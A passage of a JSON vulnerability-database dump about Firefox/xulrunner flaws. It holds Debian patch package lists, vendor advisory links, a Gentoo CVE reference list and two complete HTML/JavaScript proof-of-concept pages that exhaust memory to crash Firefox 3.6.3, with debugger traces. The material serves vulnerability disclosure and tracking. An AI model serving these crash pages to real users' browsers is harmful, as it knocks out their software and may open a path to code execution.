f1ce0ac5d9a06b8df3316679e727f3df\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.18-1_mips.deb\r\nSize/MD5 checksum: 7676832 f956e5bbe2f0b39127305a61656aed6a\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.18-1_mips.deb\r\nSize/MD5 checksum: 918340 900ca7652a94f3c85a256bbd1b9e44c3\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.18-1_mips.deb\r\nSize/MD5 checksum: 144712 43ea8dbcea280d63a42846dde20811d9\r\n\r\nmipsel architecture (MIPS (Little Endian))\r\n\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.18-1_mipsel.deb\r\nSize/MD5 checksum: 378688 823e2e84fb9f476a5362f7efe4e30777\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.18-1_mipsel.deb\r\nSize/MD5 checksum: 69948 31ec842502b7faf5dbecaa80ef2cbee1\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.18-1_mipsel.deb\r\nSize/MD5 checksum: 7379096 e48e59237114483e16f80d99dc76b2ba\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.18-1_mipsel.deb\r\nSize/MD5 checksum: 3310672 c1123f4d6e89997ddb4a09d428bbbf48\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.18-1_mipsel.deb\r\nSize/MD5 checksum: 900496 cda86c575da08ebd21bb6c6001f085cb\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.18-1_mipsel.deb\r\nSize/MD5 checksum: 145096 63bd9568ef5aaf9429c4e5b37b030c27\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.18-1_mipsel.deb\r\nSize/MD5 checksum: 49999804 682d85b71c822db082443d47bfa0dd50\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.18-1_mipsel.deb\r\nSize/MD5 checksum: 96850 23b2c1836a133774cc47868ebd2bf111\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.18-1_mipsel.deb\r\nSize/MD5 checksum: 223238 13d5d183ba4b9788153f285d67eded79\r\n\r\npowerpc architecture (PowerPC)\r\n\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.18-1_powerpc.deb\r\nSize/MD5 checksum: 7304358 74dd5ed0d04ececdc6e2918f2f9809ee\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.18-1_powerpc.deb\r\nSize/MD5 checksum: 152670 c96287c675dc73d15e15656996de1bb4\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.18-1_powerpc.deb\r\nSize/MD5 checksum: 3592560 a7e7dcd1332a7de0a851b108454c907d\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.18-1_powerpc.deb\r\nSize/MD5 checksum: 73424 46e45ae58cab7ced9fdea35598c65ec5\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.18-1_powerpc.deb\r\nSize/MD5 checksum: 223230 08d8ae57f6a060087dcdaf26e0680e32\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.18-1_powerpc.deb\r\nSize/MD5 checksum: 888386 db4e4b4915cdf22af9cb0f84ebf85d4d\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.18-1_powerpc.deb\r\nSize/MD5 checksum: 94424 55bf14bf0548eb0e378bd569dc19cb7d\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.18-1_powerpc.deb\r\nSize/MD5 checksum: 51424848 885ebada38e85a1ee012abb7d6eb73e5\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.18-1_powerpc.deb\r\nSize/MD5 checksum: 363422 320d25d4362871bd739d6612f6cecce2\r\n\r\ns390 architecture (IBM S/390)\r\n\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.18-1_s390.deb\r\nSize/MD5 checksum: 3307864 2933d8e82890dd74ede9b9c5146e7dbf\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.18-1_s390.deb\r\nSize/MD5 checksum: 406776 4ed85a0aff956abc622bc6886604fef9\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.18-1_s390.deb\r\nSize/MD5 checksum: 72972 57cd33e5a3eb33a193ed5e7b7f7d54eb\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.18-1_s390.deb\r\nSize/MD5 checksum: 156196 a130564911637e4f646bfc1a4b426210\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.18-1_s390.deb\r\nSize/MD5 checksum: 909430 287a6be6c2d44da44b5512b1865f05b6\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.18-1_s390.deb\r\nSize/MD5 checksum: 8396240 63a64bdb1c250679a39ac129e9f51740\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.18-1_s390.deb\r\nSize/MD5 checksum: 105630 8aae2a1d417e4a99c66fa96878881b62\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.18-1_s390.deb\r\nSize/MD5 checksum: 51200776 f7c31d337a4a5597637bc2e31e1ec0b7\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.18-1_s390.deb\r\nSize/MD5 checksum: 223216 cdf974bc762234a45aa5223d775de2c9\r\n\r\nsparc architecture (Sun SPARC/UltraSPARC)\r\n\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.18-1_sparc.deb\r\nSize/MD5 checksum: 143860 091ec390f015be3eba4c522c66ee51e3\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.18-1_sparc.deb\r\nSize/MD5 checksum: 821270 330960373dbb626d51d4149a81e24429\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.18-1_sparc.deb\r\nSize/MD5 checksum: 49375502 f6bec1eefff555877964ca0d5051ec98\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.18-1_sparc.deb\r\nSize/MD5 checksum: 3574148 98a929f2aa4dab1faee64e38b731ee59\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.18-1_sparc.deb\r\nSize/MD5 checksum: 69840 96c306ae02ba5538beca32315bd92b35\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.18-1_sparc.deb\r\nSize/MD5 checksum: 221208 99b117922e86cd870ac0ecd53af0ef2d\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.18-1_sparc.deb\r\nSize/MD5 checksum: 83804 7b0485601946739a0da66761c777eb53\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.18-1_sparc.deb\r\nSize/MD5 checksum: 350608 d7bb678be22d7d4e341535bc68ec8d2a\r\nhttp://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.18-1_sparc.deb\r\nSize/MD5 checksum: 7173326 9cc51c4ca3b567c93e30abd0bdd78dca\r\n\r\n\u8865\u4e01\u5b89\u88c5\u65b9\u6cd5\uff1a\r\n\r\n1. \u624b\u5de5\u5b89\u88c5\u8865\u4e01\u5305\uff1a\r\n\r\n \u9996\u5148\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u6765\u4e0b\u8f7d\u8865\u4e01\u8f6f\u4ef6\uff1a\r\n # wget url (url\u662f\u8865\u4e01\u4e0b\u8f7d\u94fe\u63a5\u5730\u5740)\r\n\r\n \u7136\u540e\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u6765\u5b89\u88c5\u8865\u4e01\uff1a \r\n # dpkg -i file.deb (file\u662f\u76f8\u5e94\u7684\u8865\u4e01\u540d)\r\n\r\n2. \u4f7f\u7528apt-get\u81ea\u52a8\u5b89\u88c5\u8865\u4e01\u5305\uff1a\r\n\r\n \u9996\u5148\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u66f4\u65b0\u5185\u90e8\u6570\u636e\u5e93\uff1a\r\n # apt-get update\r\n \r\n \u7136\u540e\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u5b89\u88c5\u66f4\u65b0\u8f6f\u4ef6\u5305\uff1a\r\n # apt-get upgrade\r\n\r\nMozilla\r\n-------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.mozilla.org/\r\n\r\nRedHat\r\n------\r\nRedHat\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08RHSA-2010:0112-01\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nRHSA-2010:0112-01\uff1aCritical: firefox security update\r\n\u94fe\u63a5\uff1ahttps://www.redhat.com/support/errata/RHSA-2010-0112.html\r\n\r\nUbuntu\r\n------\r\nUbuntu\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08USN-895-1\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nUSN-895-1\uff1afirefox-3.0, xulrunner-1.9 vulnerabilities\r\n\u94fe\u63a5\uff1ahttp://www.ubuntu.com/usn/USN-895-1", "reporter": "Root", "published": "2010-02-26T00:00:00", "title": "Firefox\u6d4f\u89c8\u5668\u5f15\u64ce\u8fdc\u7a0b\u5185\u5b58\u7834\u574f\u6f0f\u6d1e", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0159"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2010-02-26T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19191", "id": "SSV:19191", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "", "status": "details"}, {"lastseen": "2017-11-19T18:11:09", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "No description provided by source.", "reporter": "Root", "published": "2010-05-25T00:00:00", "type": "seebug", "title": "Firefox 3.6.3 (latest) &lt;= memory exhaustion crash vulnerabilities", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1571"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2010-05-25T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19691", "id": "SSV:19691", "sourceData": "\n 0x01. Description:\r\nMemory exhaustion of Firefox 3.6.3 (latest) &lt;= makes firefox can't make\r\ntexts into body element and then it crashed.\r\n( raise exception using PoC #1, lower memory area read access violation\r\nusing PoC #2 )\r\nOfcourse an variation PoC made NULL Pointer deref so may also could be code\r\nexecution ( 0.1 % ). :-)\r\n\r\nURL: http://www.x90c.org/advisories/firefox_3.6.3_crash_advisory.txt\r\n\r\nVendor Status: unpatched. ( to now... doesn't exists any reliable exploit\r\nso i disclosed to bugtraq firstly )\r\n\r\n0x02. Proof of Concepts:\r\n\r\n[PoC #1 - firefox_3.6.3_dos_poc_1.htm] --\r\n&lt;HTML&gt;\r\n&lt;HEAD&gt;\r\n&lt;SCRIPT LANGUAGE=&quot;javascript&quot;&gt;\r\n\r\n// Mozilla Firefox &lt;= 3.6.3 (Win32) 0Day DoS Proof-of-Concept #1\r\n//\r\n// o Summary:\r\n// After loading this PoC, about 40 seconds later triggered.\r\n// Crashes are occured at a same location.\r\n//\r\n// --\r\n// 7c7e2af5 ff1510157d7c call dword ptr\r\n[kernel32!_imp__RtlRaiseException (7c7d1510)]\r\n// ds:0023:7c7d1510={ntdll!RtlRaiseException (7c93e528)} ( raised\r\n)\r\n//\r\n// ##### 100% same below crash. exception raised. #####\r\n// (f34.850): C++ EH exception - code e06d7363 (first chance)\r\n// (f34.850): C++ EH exception - code e06d7363 (!!! second chance !!!)\r\n// eax=0012aa58 ebx=01000121 ecx=00000000 edx=781d7ba8 esi=0012aae0\r\nedi=2f900008\r\n// eip=7c7e2afb esp=0012aa54 ebp=0012aaa8 iopl=0 nv up ei pl nz na\r\npe nc\r\n// cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000\r\nefl=00000206\r\n// kernel32!RaiseException+0x53:\r\n// 7c7e2afb 5e pop esi\r\n// --\r\n//\r\n// Call Stack:\r\n// 00 0012aa28 7815c54b e06d7363 00000001 00000003\r\nkernel32!RaiseException+0x53\r\n// WARNING: Stack unwind information not available. Following frames may be\r\nwrong.\r\n// 01 0012aa60 78164f33 0012aa70 781caa24 781ac11c\r\nMOZCRT19!CxxThrowException+0x46\r\n// 02 0012aa78 100cd464 08c00060 0012b1a0 21500008 MOZCRT19!operator\r\nnew+0x73\r\n// 03 00000000 00000000 00000000 00000000 00000000\r\nxul!gfxWindowsFontGroup::MakeTextRun+0x54\r\n\r\n// Trace:\r\n// MOZCRT19!operator new:\r\n// 78164ec0 8b442404 mov eax,dword ptr [esp+4]\r\n// 78164ec4 83ec0c sub esp,0Ch\r\n// 78164ec7 50 push eax\r\n// 78164ec8 e8134bfdff call MOZCRT19!malloc (781399e0)\r\n// ...\r\n// 78164f26 c74424081cc11a78 mov dword ptr [esp+8],offset\r\nMOZCRT19!exception::`vftable'+0xc14 (781ac11c)\r\n// 78164f2e e8d275ffff call MOZCRT19!CxxThrowException\r\n(7815c505) ; Throw Exception.\r\n// 78164f33 83c40c add esp,0Ch\r\n// 78164f36 c3 ret\r\n//\r\n// MOZCRT19!CxxThrowException:\r\n// 7815c505 55 push ebp\r\n// 7815c506 8bec mov ebp,esp\r\n// 7815c508 83ec20 sub esp,20h\r\n// ...\r\n// 7815c545 ff15e4911a78 call dword ptr [MOZCRT19!modf+0x87d4\r\n(781a91e4)] ds:0023:781a91e4=\r\n// {kernel32!RaiseException (7c7e2aa9)} ; Raise Exception!\r\n//\r\n// o Impact: DoS ( Exception Raise )\r\n//\r\n// o Tested on:\r\n// - MS Win XP SP3 (ko)\r\n// - Mozilla Firefox 3.6.3 (Win32) (ko)\r\n// ( Mozilla/5.0, rv:1.9.2.3, Gecko/20100401 )\r\n//\r\n// P.S: This vulnerability similer with the CVE-2009-1571 [1] but it's\r\npatched on Firefox 3.6\r\n// so this is *not the same vulnerability*!\r\n//\r\n// [1] CVE-2009-1571 ( Credit: Alin Rad Pop of Secunia ) - Thanks to Alin\r\nRad Pop.\r\n// - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1571\r\n//\r\n// o Discovered by x90c in INetCop(c) Security during analysis.\r\n// o Discovered date: 2010.03.04\r\n// o Personal homepage: http://www.x90c.org\r\n//\r\n// Greets to Xpl017Elz(x82), rebel\r\n//\r\n\r\nfunction append_text_into_body()\r\n{\r\nvar p1 = document.getElementById('p1');\r\nvar Text1 = &quot;&quot;;\r\nvar TextNode = null;\r\n\r\n// Trigger! MakeFont... into p element on body element.\r\nfor(var i = 0; i &lt; 0x700000 / 4; i++)\r\n{\r\nText1 = Text1 + &quot;AAAA&quot;;\r\n}\r\n\r\nTextNode = document.createTextNode(Text1);\r\np1.appendChild(TextNode); // Memory Exhaustion makes FireFox can't make\r\nTexts it caused an crash.\r\n}\r\n\r\nvar arr1, arr2, arr3, arr4, arr5;\r\nvar a = 1;\r\n\r\nvar timer;\r\n\r\nfunction fill_all_memory()\r\n{\r\nvar chunk = unescape(&quot;%u4141%u4141&quot;);\r\nvar i = 0;\r\n\r\nif( a &gt; 5 )\r\n{\r\na++;\r\n}\r\nif(a &gt;= 30)\r\n{\r\nappend_text_into_body();\r\n}\r\n\r\nwhile(chunk.length &lt;= 0x400000)\r\n{\r\nchunk = chunk + chunk;\r\n}\r\nchunk = chunk + chunk + chunk;\r\nchunk = chunk.substring(0, chunk.length);\r\n\r\nif(a == 1)\r\n{\r\narr1 = new Array();\r\nfor(i = 0; i &lt; 0xd0; i++)\r\n{\r\narr1[i] = chunk;\r\n}\r\na = 2;\r\n}\r\nelse if(a == 2)\r\n{\r\narr2 = new Array();\r\nfor(i = 0; i &lt; 0xd0; i++)\r\n{\r\narr2[i] = chunk;\r\n}\r\na = 3;\r\n}\r\nelse if(a == 3)\r\n{\r\narr3 = new Array();\r\nfor(i = 0; i &lt; 0xd0; i++)\r\n{\r\narr3[i] = chunk;\r\n}\r\na = 4;\r\n}\r\nelse if(a == 4)\r\n{\r\narr4 = new Array();\r\nfor(i = 0; i &lt; 0xd0; i++)\r\n{\r\narr4[i] = chunk;\r\n}\r\na = 5;\r\n}\r\nelse if(a == 5)\r\n{\r\narr5 = new Array();\r\nfor(i = 0; i &lt; 0xd0; i++)\r\n{\r\narr5[i] = chunk;\r\n}\r\na = 6;\r\n}\r\n}\r\n\r\nfunction try_fill()\r\n{\r\nfill_all_memory();\r\nsetTimeout(&quot;try_fill();&quot;, 500);\r\n}\r\n\r\n&lt;/SCRIPT&gt;\r\n&lt;/HEAD&gt;\r\n\r\n&lt;BODY onload=&quot;try_fill();&quot;&gt;\r\n&lt;P id='p1'&gt;&lt;/P&gt;\r\n&lt;/BODY&gt;\r\n&lt;/HTML&gt;\r\n\r\n&lt;!-- [ eoc ] --&gt;\r\n\r\n\r\n[PoC #2 - firefox_3.6.3_dos_poc_2.htm] --\r\n\r\n&lt;HTML&gt;\r\n&lt;HEAD&gt;\r\n&lt;SCRIPT LANGUAGE=&quot;javascript&quot;&gt;\r\n\r\n// Mozilla Firefox &lt;= 3.6.3 (Win32) 0Day DoS Proof-of-Concept #2\r\n//\r\n// o Summary:\r\n// After loading this PoC, about 40 seconds later triggered.\r\n// Crashes are occured at a same location.\r\n//\r\n// --\r\n// ##### almost 99% below crash #####\r\n// (f0c.8b4): Access violation - code c0000005 (first chance)\r\n// First chance exceptions are reported before any exception handling.\r\n// This exception may be expected and handled.\r\n// eax=0012aab8 ebx=00002226 ecx=000042a4 edx=000000ee esi=00003ce8\r\nedi=000000ee\r\n// eip=73f937cd esp=0012a3fc ebp=0012a3fc iopl=0 nv up ei pl zr na\r\npe nc\r\n// cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000\r\nefl=00010246\r\n// USP10!DoubleWideCharMappedString::operator[]+0x1f:\r\n// 73f937cd 0fb70448 movzx eax,word ptr [eax+ecx*2]\r\nds:0023:00133000=???? ( beside stack area and unmapped )\r\n// --\r\n//\r\n// 0:000&gt; kp\r\n// ChildEBP RetAddr\r\n// 0012a3fc 73f99a42 USP10!DoubleWideCharMappedString::operator[]+0x1f\r\n// 0012a4cc 73f92d34 USP10!ScriptTokenize+0x91\r\n// 0012a4f4 100efc30 USP10!ScriptItemize+0x42\r\n// WARNING: Stack unwind information not available. Following frames may be\r\nwrong.\r\n// 0012a5a0 7813807d xul!gfxWindowsFontGroup::GetUnderlineOffset+0x4cb0\r\n// 00000000 00000000 MOZCRT19!expand+0x37d\r\n//\r\n// o Impact: DoS ( may also code execution )\r\n//\r\n// o Tested on:\r\n// - MS Win XP SP3 (ko)\r\n// - Mozilla Firefox 3.6.3 (Win32) (ko)\r\n// ( Mozilla/5.0, rv:1.9.2.3, Gecko/20100401 )\r\n//\r\n// P.S: This vulnerability similer with the CVE-2009-1571 [1] but it's\r\npatched on Firefox 3.6\r\n// so this is *not the same vulnerability*! and this makes same crash with\r\n[2]\r\n//\r\n// [1] CVE-2009-1571 ( Credit: Alin Rad Pop of Secunia ) - Thanks to Alin\r\nRad Pop.\r\n// - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1571\r\n//\r\n// [2] All browsers 0day Crash Exploit ( Inj3ct0r Team )\r\n// - http://www.exploit-db.com/exploits/12491\r\n//\r\n// o Discovered by x90c in INetCop(c) Security during analysis.\r\n// o Discovery date: 2010.03.04\r\n// o Personal homepage: http://www.x90c.org\r\n//\r\n// Greets to Xpl017Elz(x82), rebel\r\n//\r\n\r\nfunction append_text_into_body()\r\n{\r\nvar p1 = document.getElementById('p1');\r\nvar Text1 = &quot;&quot;;\r\nvar TextNode = null;\r\n\r\n// Trigger! MakeFont... into p element on body element.\r\nfor(var i = 0; i &lt; 0x700000 / 4; i++)\r\n{\r\nText1 = Text1 + &quot;AAAA&quot;;\r\n}\r\n\r\nTextNode = document.createTextNode(Text1);\r\np1.appendChild(TextNode); // Memory Exhaustion makes FireFox can't make\r\nTexts it caused an crash.\r\n}\r\n\r\nvar a = 1;\r\n\r\nvar timer;\r\n\r\nfunction fill_all_memory() // This function's variation can makes an null\r\npointer deref without append_text_into_body() calling.\r\n{\r\nvar chunk = unescape(&quot;%u4141%u4242&quot;);\r\nvar i = 0;\r\n\r\nappend_text_into_body();\r\n\r\nwhile(chunk.length &lt;= 0x400000)\r\n{\r\nchunk = chunk + chunk;\r\n}\r\nchunk = chunk + chunk + chunk;\r\nchunk = chunk.substring(0, chunk.length);\r\n}\r\n\r\nfunction try_fill()\r\n{\r\nfill_all_memory();\r\n// this poc makes 99% almost crashed same location as below.\r\n// 10: USP10!DoubleWideCharMappedString::operator[]+0x1f:\r\n// 73f937cd 0fb70448 movzx eax,word ptr [eax+ecx*2]\r\nds:0023:00133000=????\r\n// 100: ''\r\n// 150: ''\r\n// 200: ''\r\n// 300: ''\r\n// 500: ''\r\n// 1000: ''\r\n// 5000: ''\r\nsetTimeout(&quot;try_fill();&quot;, 10);\r\n}\r\n\r\n&lt;/SCRIPT&gt;\r\n&lt;/HEAD&gt;\r\n\r\n&lt;BODY onload=&quot;try_fill();&quot;&gt;\r\n&lt;P id='p1'&gt;&lt;/P&gt;\r\n&lt;/BODY&gt;\r\n\r\n&lt;/HTML&gt;\r\n\r\n&lt;!-- [ eoc ] --&gt;\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-19691", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "status": "poc"}], "gentoo": [{"lastseen": "2016-09-06T19:46:13", "references": ["https://bugs.gentoo.org/show_bug.cgi?id=404437", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2998", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3073", "https://bugs.gentoo.org/show_bug.cgi?id=312645", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1937", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3665", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0078", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2764", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3650", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1121", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2751", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0177", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1952", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3400", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3661", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1187", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0165", "https://bugs.gentoo.org/show_bug.cgi?id=439586", "https://bugs.gentoo.org/show_bug.cgi?id=324735", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5510", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1307", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1712", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0442", "https://bugs.gentoo.org/show_bug.cgi?id=290892", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1202", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0447", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5354", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3373", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4183", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1392", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5513", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0172", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3958", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1311", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0055", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4208", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1196", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0061", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3002", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0468", "https://bugs.gentoo.org/show_bug.cgi?id=373595", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2654", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2376", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4187", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3966", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4191", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3987", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0479", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3985", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3773", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5842", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4181", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3963", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3984", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1976", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4184", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3655", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1202", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0017", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1962", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2997", "https://bugs.gentoo.org/show_bug.cgi?id=207261", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2065", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3005", "https://bugs.gentoo.org/show_bug.cgi?id=267234", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0473", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0474", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0167", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2988", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4188", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0170", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1309", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0470", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5511", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0775", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2980", "https://bugs.gentoo.org/show_bug.cgi?id=313003", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0457", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0173", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5024", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3004", "https://bugs.gentoo.org/show_bug.cgi?id=261386", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-5021", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1973", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0451", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3660", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1834", "https://bugs.gentoo.org/show_bug.cgi?id=305689", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-0353", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3076", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3964", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1841", "https://bugs.gentoo.org/show_bug.cgi?id=395431", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3977", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0449", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-4067", "https://bugs.gentoo.org/show_bug.cgi?id=257577", 